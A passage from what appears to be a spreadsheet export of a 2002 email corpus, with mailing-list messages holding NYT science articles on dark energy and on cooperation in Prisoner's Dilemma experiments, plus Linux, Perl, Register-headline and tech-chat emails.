hauntingly reminiscent\nof Einstein's old, presumably discredited, cosmological\nconstant. \n\n"Dark energy," the phenomenon was quickly named. \n\nIf dark\nenergy is real and the acceleration continues, the galaxies\nwill eventually speed away from one another so quickly that\nthey couldn't see one another. The universe would become\ncold and empty as the continued acceleration sucked away\nthe energy needed for life and thought. \n\nIt would be "the worst possible universe," for the quality\nand quantity of life, said Dr. Lawrence Krauss, a physicist\nat Case Western Reserve University. \n\nDr. Edward Witten of the Institute for Advanced Study in\nPrinceton, called the discovery of dark energy "the\nstrangest experimental finding since I've been in physics."\n\n\nThe discovery was a surprise to the astronomers involved.\nNeither team had expected to find the universe\naccelerating. They had each set out to measure by how much\nthe expansion of the universe was slowing because of the\ngravity of its contents and thus settle the question of its\nfate. \n\nOne team was led by Dr. Saul Perlmutter, a physicist at\nLawrence Berkeley. The other team was a band of astronomers\nled by Dr. Brian Schmidt of Mount Stromlo and the Siding\nSpring Observatory in Australia. \n\nEach group employed far-flung networks of telescopes,\nincluding the Hubble, and the Internet to find and monitor\ncertain exploding stars, or supernovas, as cosmic beacons.\nSuch explosions, the death rattles of massive stars, are\npowerful enough to be seen clear across the universe when\nthe universe was younger and, presumably, expanding faster.\n\n\nLeapfrogging each other across the universe, the two teams,\npropitiously for their credibility, arrived at the same\nanswer at the same time: the cosmos was not slowing at all;\nit was speeding up. \n\nDr. Perlmutter, who had once resented the competition,\nconceded, "With only one group, it would have been a lot\nharder to get the community to buy into such a surprising\nresult." \n\n"This was a very strange result," said Dr. Adam Riess, a\nmember of Dr. Schmidt's team. "It was the opposite of what\nwe thought we were doing." \n\nThe results have sent Einstein's old cosmological constant\nto the forefront of cosmology. Despite his disavowal, the\nconstant had never really gone away and had in fact been\ngiven new life by quantum physics. Einstein had famously\nrejected quantum's randomness, saying God didn't play dice.\n\n\nBut it justified, in retrospect, his fudge factor. \n\nAccording to the uncertainty principle, a pillar of quantum\ntheory, empty space was not empty, but rather foaming with\nthe energy of so-called virtual particles as they flashed\nin and out of existence on borrowed energy. This so-called\nvacuum energy could repel, just like Einstein's old\ncosmological constant, or attract. \n\nThe case for dark energy got even stronger a year later,\nwhen the cosmic background observations reported evidence\nof a flat universe. Because astronomers had been able to\nfind only about a third as much matter, both dark and\nluminous, as was needed by Einstein's laws to create a flat\ngeometry, something else had to be adding to it. \n\nThe discovery of dark energy exemplified Dr. Zeldovich's\nview of the universe as the poor man's particle\naccelerator, and it caught the physicists flat-footed,\nsomewhat to the pride of the astronomers. \n\n"A coming of age of astronomy," Dr. Dressler called it.\n\n\nWhat is dark energy? The question now hangs over the\nuniverse. \n\nIs it really Einstein's old fudge factor returned to haunt\nhis children? In that case, as the universe expands and the\nvolume of space increases, astronomers say, the push\nbecause of dark energy will also increase, accelerating the\ngalaxies away from one another faster and faster, leading\nto a dire dark future. \n\nOther physicists, however, have pointed out that the\ntheories of modern physics are replete with mysterious\nforce fields, collectively called "quintessence," that\nmight or might not exist, but that could temporarily\nproduce negative gravity and mimic the action of a\ncosmological constant. In that case, all bets on the future\nare off. The universe could accelerate and then decelerate,\nor vice versa as the dark energy fields rose or fell. \n\nA third possibility is that dark energy does not exist at\nall, in which case not just the future, but the whole\ncarefully constructed jigsaw puzzle of cosmology, might be\nin doubt. The effects of cosmic acceleration could be\nmimicked, astronomers say, by unusual dust in the far\nuniverse or by unsuspected changes in the characteristics\nof supernovas over cosmic time. As a result, more groups\nare joining the original two teams in the hunt for new\nsupernovas and other ways to measure the effects of dark\nenergy on the history of the universe. \n\nDr. Perlmutter has proposed building a special satellite\ntelescope, the Supernova Astronomy Project, to investigate\nexactly when and how abruptly the cosmic acceleration\nkicked in. \n\nThe Nagging QuestionsA Grand Synthesis, \nBut Hardly Complete \nFor all the new answers being\nharvested, some old questions linger, and they have now\nbeen joined by new ones. \n\nA flat universe is the most mathematically appealing\nsolution of Einstein's equations, cosmologists agree. But\nthey are puzzled by the specific recipe, large helpings of\ndark matter and dark energy, that nature has chosen. Dr.\nTurner called it "a preposterous universe." \n\nBut Dr. Martin Rees, a Cambridge University cosmologist,\nsaid that the discovery of a deeper principle governing the\nuniverse and, perhaps, life, may alter our view of what is\nfundamental. Some features of the universe that are now\nconsidered fundamental - like the exact mixture of dark\nmatter, dark energy and regular stuff in the cosmos - may\nturn out to be mere accidents of evolution in one out of\nthe many, many universes allowed by eternal inflation. \n\n"If we had a theory, then we would know whether there were\nmany big bangs or one," Dr. Rees said. The answers to these\nand other questions, many scientists suspect, have to await\nthe final unification of physics, a theory that reconciles\nEinstein's relativity, which describes the shape of the\nuniverse, to the quantum chaos that lives inside it. \n\nSuch a theory, quantum gravity, is needed to describe the\nfirst few moments of the universe, when it was so small\nthat even space and time should become fuzzy and\ndiscontinuous. \n\nFor two decades, many physicists have placed their bets for\nquantum gravity on string theory, which posits that\nelementary particles are tiny strings vibrating in a 10- or\n11-dimensional space. Each kind of particle, in a sense,\ncorresponds to a different note on the string. \n\nIn principle, string theory can explain all the forces of\nnature. But even its adherents concede that their equations\nare just approximations to an unknown theory that they call\nM-theory, with "M" standing for matrix, magic, mystery or\neven mother, as in "mother of all theories." Moreover, the\neffects of "stringy physics" are only evident at energies\nforever beyond the limits of particle accelerators. \n\nSome string theorists have ventured into cosmology, hoping,\nto discover some effect that would show up in the poor\nman's particle accelerator, the sky. \n\nIn addition to strings, the theory also includes membranes,\nor "branes," of various dimensions. Our universe can be\nenvisioned as such a brane floating in higher-dimensional\nspace like a leaf in a fish tank, perhaps with other brane\nuniverses nearby. These branes could interact\ngravitationally or even collide, setting off the Big Bang. \n\nIn one version suggested last year by four cosmologists\nled by Dr. Steinhardt of Princeton, another brane would\nrepeatedly collide with our own. They pass back and forth\nthrough each other, causing our universe to undergo an\neternal chain of big bangs. \n\nSuch notions are probably the future for those who are paid\nto wonder about the universe. \n\nAnd the fruits of this work could yet cause cosmologists to\nreconsider their new consensus, warned Dr. Peebles of\nPrinceton, who has often acted as the conscience of the\ncosmological community, trying to put the brakes on faddish\ntrends. \n\nHe wonders whether the situation today can be compared to\nanother historical era, around 1900, when many people\nthought that physics was essentially finished and when the\nEnglish physicist Lord Kelvin said that just a couple of\n"clouds" remained to be dealt with. \n\n"A few annoying tidbits, which turned out to be relativity\nand quantum theory," the twin revolutions of 20th-century\nscience, Dr. Peebles said. \n\nLikewise, there are a few clouds today like what he called\n"the dark sector," which could have more complicated\nphysics than cosmologists think. \n\n"I'm not convinced these clouds herald revolutions as deep\nas relativity and quantum mechanics," Dr. Peebles said.\n"I'm not arguing that they won't." \n\nAs for the fate of the universe, we will never have a firm\nanswer, said Dr. Sandage, who was Hubble's protg and has\nseen it all. \n\n"It's like asking, `Does God exist?' " he said.\n\n\nPredicting the future, he pointed out, requires faith that\nsimple mathematical models really work to describe the\nuniverse. \n\n"I don't think we really know how things work," he said.\n\n\nAlthough Dr. Sandage does not buy into all aspects of the\nemerging orthodoxy, he said it was a fantastic time to be\nalive. \n\n"It's all working toward a much grander synthesis than we\ncould have imagined 100 years ago," he said. "I think this\nis the most exciting life I could have had."\n\n[URL]http://www.nytimes.com[/URL]\n\n\n\nHOW TO ADVERTISE\n---------------------------------\nFor information on advertising in e-mail newsletters \nor other creative advertising opportunities with The \nNew York Times on the Web, please contact\nonlinesales@nytimes.com or visit our online media \nkit at [URL]http://www.nytimes.com[/URL]\n\nFor general information about NYTimes.com, write to \nhelp@nytimes.com.  \n\nCopyright 2002 The New York Times Company\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.nytimes.com http://www.nytimes.com http://xent.com</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: khare@alumni.caltech.edu\nDate: Tue, 23 Jul 2002 05:10:40 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 05:10:40 -0400 (EDT)</t>
  </si>
  <si>
    <t>NYTimes.com Article: Why We're So Nice: We're Wired to Cooperate</t>
  </si>
  <si>
    <t>This article from NYTimes.com \nhas been sent to you by khare@alumni.caltech.edu.\n\n\nAxelrod, eh? "the E.coli of social psychology"? Nice to see our old friend still going strong -- Prisoner's Dilemma is old enough to qualify for AARP membership!\n\nRegarding experimental design, it is interesting that 1) they used an all-female panel and 2) they included a mix of ages, from 20-60 and 3) they used humans, confederates, computers as well as imitations. \n\nThe last two paragraphs are a rare sign of editorialized humor by an NY Times bylined writer. Even still, note the very large fig leaf -- the CEO joke is introduced in an on-the-record quote. \n\nNot that we're talking about anything nearly as colorful as the Economist :-)\n\nRK\n\nkhare@alumni.caltech.edu\n\n\nWhy We're So Nice: We're Wired to Cooperate\n\nJuly 23, 2002\nBy NATALIE ANGIER \n\n\n\n\n \n\nWhat feels as good as chocolate on the tongue or money in\nthe bank but won't make you fat or risk a subpoena from the\nSecurities and Exchange Commission? \n\nHard as it may be to believe in these days of infectious\ngreed and sabers unsheathed, scientists have discovered\nthat the small, brave act of cooperating with another\nperson, of choosing trust over cynicism, generosity over\nselfishness, makes the brain light up with quiet joy. \n\nStudying neural activity in young women who were playing a\nclassic laboratory game called the Prisoner's Dilemma, in\nwhich participants can select from a number of greedy or\ncooperative strategies as they pursue financial gain,\nresearchers found that when the women chose mutualism over\n"me-ism," the mental circuitry normally associated with\nreward-seeking behavior swelled to life. \n\nAnd the longer the women engaged in a cooperative strategy,\nthe more strongly flowed the blood to the pathways of\npleasure. \n\nThe researchers, performing their work at Emory University\nin Atlanta, used magnetic resonance imaging to take what\nmight be called portraits of the brain on hugs. \n\n"The results were really surprising to us," said Dr.\nGregory S. Berns, a psychiatrist and an author on the new\nreport, which appears in the current issue of the journal\nNeuron. "We went in expecting the opposite." \n\nThe researchers had thought that the biggest response would\noccur in cases where one person cooperated and the other\ndefected, when the cooperator might feel that she was being\ntreated unjustly. \n\nInstead, the brightest signals arose in cooperative\nalliances and in those neighborhoods of the brain already\nknown to respond to desserts, pictures of pretty faces,\nmoney, cocaine and any number of licit or illicit delights.\n\n\n"It's reassuring," Dr. Berns said. "In some ways, it says\nthat we're wired to cooperate with each other." \n\nThe study is among the first to use M.R.I. technology to\nexamine social interactions in real time, as opposed to\ntaking brain images while subjects stared at static\npictures or thought-prescribed thoughts. \n\nIt is also a novel approach to exploring an ancient\nconundrum, why are humans so, well, nice? Why are they\nwilling to cooperate with people whom they barely know and\nto do good deeds and to play fair a surprisingly high\npercentage of the time? \n\nScientists have no trouble explaining the evolution of\ncompetitive behavior. But the depth and breadth of human\naltruism, the willingness to forgo immediate personal gain\nfor the long-term common good, far exceeds behaviors seen\neven in other large-brained highly social species like\nchimpanzees and dolphins, and it has as such been difficult\nto understand. \n\n"I've pointed out to my students how impressive it is that\nyou can take a group of young men and women of prime\nreproductive age, have them come into a classroom, sit down\nand be perfectly comfortable and civil to each other," said\nDr. Peter J. Richerson, a professor of environmental\nscience and policy at the University of California at Davis\nand an influential theorist in the field of cultural\nevolution. "If you put 50 male and 50 female chimpanzees\nthat don't know each other into a lecture hall, it would be\na social explosion." \n\nDr. Ernst Fehr of the University of Zurich and colleagues\nrecently presented findings on the importance of punishment\nin maintaining cooperative behavior among humans and the\nwillingness of people to punish those who commit crimes or\nviolate norms, even when the chastisers take risks and gain\nnothing themselves while serving as ad hoc police. \n\nIn her survey of the management of so-called commons in\nsmall-scale communities where villagers have the right, for\nexample, to graze livestock on commonly held land, Dr.\nElinor Ostrom of Indiana University found that all\ncommunities have some form of monitoring to gird against\ncheating or using more than a fair share of the resource. \n\nIn laboratory games that mimic small-scale commons, Dr.\nRicherson said, 20 to 30 percent have to be coerced by a\nthreat of punishment to cooperate. \n\nFear alone is not highly likely to inspire cooperative\nbehavior to the degree observed among humans. If research\nlike Dr. Fehr's shows the stick side of the equation, the\nnewest findings present the neural carrot - people\ncooperate because it feels good to do it. \n\nIn the new findings, the researchers studied 36 women from\n20 to 60 years old, many of them students at Emory and\ninspired to participate by the promise of monetary rewards.\nThe scientists chose an all-female sample because so few\nbrain-imaging studies have looked at only women. Most have\nbeen limited to men or to a mixture of men and women. \n\nBut there is a vast body of non- imaging data that rely on\nusing the Prisoner's Dilemma. \n\n"It's a simple and elegant model for reciprocity," said Dr.\nJames K. Rilling, an author on the Neuron paper who is at\nPrinceton. "It's been referred to as the E. coli of social\npsychology." \n\n&gt;&gt;From past results, the researchers said, one can assume\nthat neuro- imaging studies of men playing the game would\nbe similar to their new findings with women. \n\nThe basic structure of the trial had two women meet each\nother briefly ahead of time. One was placed in the scanner\nwhile the other remained outside the scanning room. The two\ninteracted by computer, playing about 20 rounds of the\ngame. In every round, each player pressed a button to\nindicate whether she would "cooperate" or "defect." Her\nanswer would be shown on-screen to the other player. \n\nThe monetary awards were apportioned after each round. If\none player defected and the other cooperated, the defector\nearned $3 and the cooperator nothing. If both chose to\ncooperate, each earned $2. If both opted to defect, each\nearned $1. \n\nHence, mutual cooperation from start to finish was a far\nmore profitable strategy, at $40 a woman, than complete\nmutual defection, which gave each $20. \n\nThe risk that a woman took each time she became greedy for\na little bit more was that the cooperative strategy would\nfall apart and that both would emerge the poorer. \n\nIn some cases, both women were allowed to pursue any\nstrategy that they chose. In other cases, the non- scanned\nwoman would be a "confederate" with the researchers,\ninstructed, unbeknown to the scanned subject, to defect\nafter three consecutive rounds of cooperation, the better\nto keep things less rarefied and pretty and more lifelike\nand gritty. \n\nIn still other experiments, the woman in the scanner played\na computer and knew that her partner was a machine. In\nother tests, women played a computer but thought that it\nwas a human. \n\nThe researchers found that as a rule the freely\nstrategizing women cooperated. Even occasional episodes of\ndefection, whether from free strategizers or confederates,\nwere not necessarily fatal to an alliance. \n\n"The social bond could be reattained easily if the defector\nchose to cooperate in the next couple of rounds," another\nauthor of the report, Dr. Clinton D. Kilts, said, "although\nthe one who had originally been `betrayed' might be wary\nfrom then on." \n\nAs a result of the episodic defections, the average\nper-experiment take for the participants was in the $30's.\n"Some pairs, though, got locked into mutual defection," Dr.\nRilling said. \n\nAnalyzing the scans, the researchers found that in rounds\nof cooperation, two broad areas of the brain were\nactivated, both rich in neurons able to respond to\ndopamine, the brain chemical famed for its role in\naddictive behaviors. \n\nOne is the anteroventral striatum in the middle of the\nbrain right above the spinal cord. Experiments with rats\nhave shown that when electrodes are placed in the striatum,\nthe animals will repeatedly press a bar to stimulate the\nelectrodes, apparently receiving such pleasurable feedback\nthat they will starve to death rather than stop pressing\nthe bar. \n\nAnother region activated during cooperation was the\norbitofrontal cortex in the region right above the eyes. In\naddition to being part of the reward-processing system, Dr.\nRilling said, it is also involved in impulse control. \n\n"Every round, you're confronted with the possibility of\ngetting an extra dollar by defecting," he said. "The choice\nto cooperate requires impulse control." \n\nSignificantly, the reward circuitry of the women was\nconsiderably less responsive when they knew that they were\nplaying against a computer. The thought of a human bond,\nbut not mere monetary gain, was the source of contentment\non display. \n\nIn concert with the imaging results, the women, when asked\nafterward for summaries of how they felt during the games,\noften described feeling good when they cooperated and\nexpressed positive feelings of camaraderie toward their\nplaying partners. \n\nAssuming that the urge to cooperate is to some extent\ninnate among humans and reinforced by the brain's feel-good\ncircuitry, the question of why it arose remains unclear.\nAnthropologists have speculated that it took teamwork for\nhumanity's ancestors to hunt large game or gather difficult\nplant foods or rear difficult children. So the capacity to\ncooperate conferred a survival advantage on our forebears. \n\nYet as with any other trait, the willingness to abide by\nthe golden rule and to be a good citizen and not cheat and\nsteal from one's neighbors is not uniformly distributed. \n\n"If we put some C.E.O.'s in here, I'd like to see how they\nrespond," Dr. Kilts said. "Maybe they wouldn't find a\npositive social interaction rewarding at all." \n\nA Prisoner's Dilemma indeed.\n\n\n[URL]http://www.nytimes.com[/URL]\n\n\n\nHOW TO ADVERTISE\n---------------------------------\nFor information on advertising in e-mail newsletters \nor other creative advertising opportunities with The \nNew York Times on the Web, please contact\nonlinesales@nytimes.com or visit our online media \nkit at [URL]http://www.nytimes.com[/URL]\n\nFor general information about NYTimes.com, write to \nhelp@nytimes.com.  \n\nCopyright 2002 The New York Times Company\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Reg Subscribers &lt;update@list.theregister.co.uk&gt;\nFrom: update@list.theregister.co.uk\nDate: Tue, 23 Jul 2002 03:00:01 +0100</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 03:00:01 +0100</t>
  </si>
  <si>
    <t>Reg Headlines Tuesday July 23</t>
  </si>
  <si>
    <t>Today's Headlines from The Register\n-----------------------------------\n\n    To unsubscribe from this daily news update, see the instructions at\n    the end of this message.\n\n\n\nSoftware\n\n    Ex-Microserf Schmidt as govt cyberterror Cassandra\n    Apocalypse soon\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Bruce Perens on Real's Open Source gambit\n    Media Frenzy\n\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Fingerprinting of UK school kids causes outcry\n    Prison-style fingerprint checking technology replaces library cards, or What Big Brother did next\n        [URL]http://www.theregister.co.uk[/URL]\n\n    MS planning to tackle leaked WinXP keys with SP1?\n    Mass zeroing of corporate keys mooted\n        [URL]http://www.theregister.co.uk[/URL]\n\nPersonal Hardware\n\n    Microsoft's Canary phone - the first pics\n    What a Stinker!\n        [URL]http://www.theregister.co.uk[/URL]\n\n    We hate our iPAQs\n    Very long list of complaints\n        [URL]http://www.theregister.co.uk[/URL]\n\nInternet\n\n    EU intros site, freephone service to solve citizens' problems\n    Their internal market problems anyway. Yum...\n        [URL]http://www.theregister.co.uk[/URL]\n\n    IETF puts weight behind Advanced Encryption Standard\n    Improved secrecy and security, one TLA at a time\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Volunteer snoops coming to an ISP near you?\n    Operation Cyber-TIPS\n\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Tiscali to launch Excite across Europe\n    Ssssshhhh, it's a secret\n        [URL]http://www.theregister.co.uk[/URL]\n\nNet Security\n\n    Ex-Microserf Schmidt as govt cyberterror Cassandra\n    Apocalypse soon\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Serious PHP vuln reported\n    Worse on Sparc than Intel\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Symantec's SecurityFocus buyout met with pessimism\n    Bug trackers fear BugTraq death\n        [URL]http://www.theregister.co.uk[/URL]\n\n    IETF puts weight behind Advanced Encryption Standard\n    Improved secrecy and security, one TLA at a time\n        [URL]http://www.theregister.co.uk[/URL]\n\nBusiness\n\n    EDS rejects WorldCom accounting allegations\n    'Unfounded'\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Hopes of PC market recovery dashed\n    Dell close to overtaking HP in becalmed sector\n        [URL]http://www.theregister.co.uk[/URL]\n\n    WorldCom dives for Chapter 11 cover\n    No surprises there\n        [URL]http://www.theregister.co.uk[/URL]\n\n    ARM plans to charge options against profits\n    UK market's first 'we're not Enron, oh no sir' move\n        [URL]http://www.theregister.co.uk[/URL]\n\n\n\nThe Register and its contents are copyright 2002 Situation Publishing.\nAll rights reserved.\n\n    Tel:     +44 (0)20 7499 2264.\n    Fax:     +44 (0)20 7493 5922.\n    E-Mail:  press.releases@theregister.co.uk\n\nTo unsubscribe from these daily updates, visit the following URL.  Make\nsure that you enter exactly the same e-mail address as you used to join\nthis service.\n\n    [URL]http://list.theregister.co.uk[/URL]</t>
  </si>
  <si>
    <t>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list.theregister.co.uk</t>
  </si>
  <si>
    <t>To: Chris Garrigues &lt;cwg-dated-1027805573.3ce2ae@DeepEddy.Com&gt;\nFrom: Anders Eriksson &lt;aeriksson@fastmail.fm&gt;\nDate: Tue, 23 Jul 2002 02:20:35 +0200</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 02:20:35 +0200</t>
  </si>
  <si>
    <t>Chris Garrigues &lt;cwg-dated-1027805573.3ce2ae@DeepEddy.Com&gt;</t>
  </si>
  <si>
    <t>Re: Another bug</t>
  </si>
  <si>
    <t>&gt; &gt; &gt; My feeling of this is that we really do not want to have a \n&gt; &gt; &gt; Ftoc_ClearCurrent, but rather just a RescanLine and the caller had \n&gt; &gt; &gt; better know the line or msgid. That routine shoud just put in the '+' \n&gt; &gt; &gt; if the line/msg in question happened to be the cur msg. Thoughts?\n&gt; &gt; \n&gt; &gt; Intuitively, that sounds right to me.  It does also call "tag remove", so \n&gt; &gt; you'll have to make sure that gets set correctly as well.\n&gt; &gt; \n&gt; &gt; I think any changes that make it behave more intuitively are a good thing even \n&gt; &gt; if they mean we have something else to fix.  Of course, that attitude is why \n&gt; &gt; I've been fixing exmh bugs for 3 weeks.\n&gt; \nI have a version that's working now. I'll try it a couple of days and \ncheck it during daylight. Basically I added an agument to \nClearCurrent and updated all callers to slap in $ftoc(curLine). I \nalso flipped the order in  Msg_Change to ClearCurrent $prevline after \nthe Mh_SetCur. For some reason it barfs when Marking many messages \nUnread. I'll check that tomorrow.\n\nG'night.\n\n/Anders\n\n\n\n_______________________________________________\nExmh-workers mailing list\nExmh-workers@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Tue, 23 Jul 2002 02:00:30 +0000</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 02:00:30 +0000</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-07-23</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * This week on perl5-porters (15-21 July 2002)\n    * LAN Party at OSCON\n\n+--------------------------------------------------------------------+\n| This week on perl5-porters (15-21 July 2002)                       |\n|   posted by rafael on Monday July 22, @03:21 (summaries)           |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\nOK, you know already the big news of the week, don't you ? This report\nwill tell you what happened behind the scenes of the 5.8.0 final\nreleasing.\n\nThis story continues at:\n    [URL]http://use.perl.org[/URL]\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\n\n+--------------------------------------------------------------------+\n| LAN Party at OSCON                                                 |\n|   posted by ziggy on Monday July 22, @13:06 (events)               |\n|   [URL]http://use.perl.org[/URL]               |\n+--------------------------------------------------------------------+\n\n[0]cwest writes "At [1]O'Reilly [2]Open Source Convention, [3]Aaronsen\nGroup Ltd, [4]DynDNS, and [5]Stonehenge Consulting are hosting a great\nparty. 15 gaming class computers will be networked together as the base\nof a killer [6]Quake 3 Arena fragging. The bar will be open for your\ndrinking pleasure. The party is open to all OSCON attendees and\nparticipants. Come rub elbows with the best programmers on earth and\nsimultaneously destroy them in Quake."\n\nThe [7]LAN Party will be held on Thursday, 8pm - ??, at Quinn's bar (main\nlobby, Sheraton East Tower at the conference).\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. [URL]http://www.dyndns.org[/URL]\n    1. [URL]http://oreilly.com[/URL]\n    2. [URL]http://conferences.oreilly.com[/URL]\n    3. [URL]http://www.aaronsen.com[/URL]\n    4. [URL]http://www.dyndns.org[/URL]\n    5. [URL]http://www.stonehenge.com[/URL]\n    6. [URL]http://www.quake3arena.com[/URL]\n    7. [URL]http://www.dyndns.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 http://use.perl.org http://use.perl.org http://www.dyndns.org http://oreilly.com http://conferences.oreilly.com http://www.aaronsen.com http://www.dyndns.org http://www.stonehenge.com http://www.quake3arena.com http://www.dyndns.org http://use.perl.org</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Tue, 23 Jul 2002 02:00:23 +0000</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 02:00:23 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-07-23</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer\n\nThis week on perl5-porters (15-21 July 2002)\n    posted by rafael on Monday July 22, @03:21 (summaries)\n    [URL]http://use.perl.org[/URL]\n\nLAN Party at OSCON\n    posted by ziggy on Monday July 22, @13:06 (event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michael.conry@ucd.ie, ant@elivefree.net, ilug@linux.ie\nFrom: ccostelloe@flogas.ie\nDate: Tue, 20 Aug 2002 9:39:22 +0100</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 9:39:22 +0100</t>
  </si>
  <si>
    <t>ccostelloe@flogas.ie</t>
  </si>
  <si>
    <t>michael.conry@ucd.ie, ant@elivefree.net, ilug@linux.ie</t>
  </si>
  <si>
    <t>Re[2]: [ILUG] hwclock</t>
  </si>
  <si>
    <t>&gt; On 0020 +0100 %{!Mon, Aug 19, 2002 at 11:30:12PM +0100}, Anthony wrote:\n&gt;&gt; to the net. However, I didn't realise that Windows altered the hw clock\n&gt;&gt; as there was no mention of it in any of the docs I read. &gt;&gt; I still dual-boot on a regular basis and if Windows is sneakily messing\n&gt;&gt; with the clock, I'd be interested to know in what way it is and how it\n&gt;&gt; couild be stopped from doing so.\n&gt; In my experience Windows will change the hardware clock the first time\n&gt; you boot into it after the clocks have gone forward/back an hour.  This\n&gt; will only happen twice a year. How to stop it, I have not checked (I\n&gt; just switch the clock back an hour from within windows after such a\n&gt; reboot).  Is there a GMT windows timezone?\n\nStart-&gt;Settings-&gt;Control Panel-&gt;Date/Time-&gt;Time Zone tab-&gt; Uncheck\n"Automatically adjust clock for daylight saving change".\n\nCiaran\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ILUG &lt;ilug@linux.ie&gt;\nFrom: Tim &lt;timod@esatclear.ie&gt;\nDate: Tue, 20 Aug 2002 23:51:16 +0100</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 23:51:16 +0100</t>
  </si>
  <si>
    <t>Tim &lt;timod@esatclear.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG] [OT] MacOSX mailing list?</t>
  </si>
  <si>
    <t>Hi all,\n\nSorry for the OT. Just wondering if anybody knows of a similar type mailing\nlist specifically dealing with MacOSX?  (which, FYI is a version of BSD)\n\n\nSln,\n\nTim\n\n-- \nOne month on the internet in Ireland: Eur720\nOne month on the internet in Britain: Eur 25\nVisit [URL]http://www.irelandoffline.org[/URL]\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.irelandoffline.org http://www.linux.ie</t>
  </si>
  <si>
    <t>To: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;\nFrom: Eugen Leitl &lt;eugen@leitl.org&gt;\nDate: Tue, 20 Aug 2002 23:49:53 +0200 (CEST)</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 23:49:53 +0200 (CEST)</t>
  </si>
  <si>
    <t>Re: Snag Ware</t>
  </si>
  <si>
    <t>On Tue, 20 Aug 2002, Joseph S. Barrera III wrote:\n\n&gt; I just use the free/adware version of Opera. I mean, half the pages\n\nI just use Mozilla, and don't have to think about ignoring toolbar ads\naltogether. I can tell Mozilla to ignore particularly obnoxious ads, and \nbusinesses who're particularly "clever" about making me see them obviously \ndon't want me to see them after all (since I leave, and never come back).\n\n&gt; I look at have ads on them anways, so I'm pretty good at ignoring them.\n&gt; Plus, you can change settings that change what type of ads you get,\n&gt; so the ads I get are pretty innocuous. I think I listed books and\n&gt; sleeping as my interests :-)\n\nI notice Opera tends to ignore my advertisement preferences, so this is \nthe core reason why I don't use it. Mozilla does almost everything Opera \ndoes, minus the obnoxious ad slime, so why use use Opera then?\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "'Eugen Leitl'" &lt;eugen@leitl.org&gt;,\nFrom: "Rob Shavell" &lt;rob@mobiusvc.com&gt;\nDate: Tue, 20 Aug 2002 23:36:13 -0700</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 23:36:13 -0700</t>
  </si>
  <si>
    <t>"'Eugen Leitl'" &lt;eugen@leitl.org&gt;,</t>
  </si>
  <si>
    <t>thx for the thoughts gentlemen (yes as someone said i use terms loosely) -\n\nmore than cool ---&gt;\n\nquality: snobs only care about mpixels. this is about communications.  the\ngeneral public cares about speed not quality.  how is akamai doing these\ndays? not to mention any other QOS businesses that come to mind.\n\nimplementation: point about hooking to usb, wires, etc. AGREE 100%. these\nimplementations are super clunky, attachable camera needs to be integrated a\nla nokia model.  basically useless until better handsets are released i\nthink.\n\nadoption: ian brought up the 'fax' problem.  brilliant thing is, this is far\nmore personal than faxes so can be justified more easily and marketed in\nfamily packs etc. but yes, the usual rules apply as MMS phones have network\nefx.\n\ncontent: who cares about content?  that no one can think of 'useful' content\nis always the business persons mistake. the content is the users\ncommunications.  its anything and everything.  avg person could easily send\nhalf dozen pics to a dozen people a day.  mainly humorous i'd guess. who\ncares if content is trivial in nature. picture speaks a thousand words.\n\ndisplay: why are dig camera displays better than cell phones?  does anyone\nknow who makes these small displays and what the trends are around them?\n\nmisc ramblings: i suppose you skeptical forkers would have said the same\nthing about '1 hour photo' processing.  trivial, who needs it, i get better\nresultion elswhere.  and yet, it had great decentralizing impact - the plant\nhad to be downsized and pushed to the retail operation - the digital camera,\nand finally the integrated digital camera phone brings this cycle of\ndecentralization in photography to a logical conclusion (which will put the\nphoto giants to bed) and change the world in a meaningful way.  also, SMS\ndidn't take off because its easy, it took off because it costs less.  its\ngreatly ironic the carriers often trumpet the 'profitabilty' of their SMS\ntraffic over others because of its ratio of cost to bandwidth.  in reality,\nSMS cannibilizes the voice rev's they bought their networks to handle.\n\nps:  it is relatively amusing that one 'low resolution' complaint dropped\njust after Joe watched a CARTOON on his television..\n\nYou're right. Or at least, I don't. I saw an advert for it on TV last\nnight (can't miss Futurama :-) and I thought, "boy, that's dumb."\nIf I wanted to share pictures with someone, I'd email them to them,\nwhere they could see them on a 1024x or 1600x display, instead of\n\nrob\n\n\n-----Original 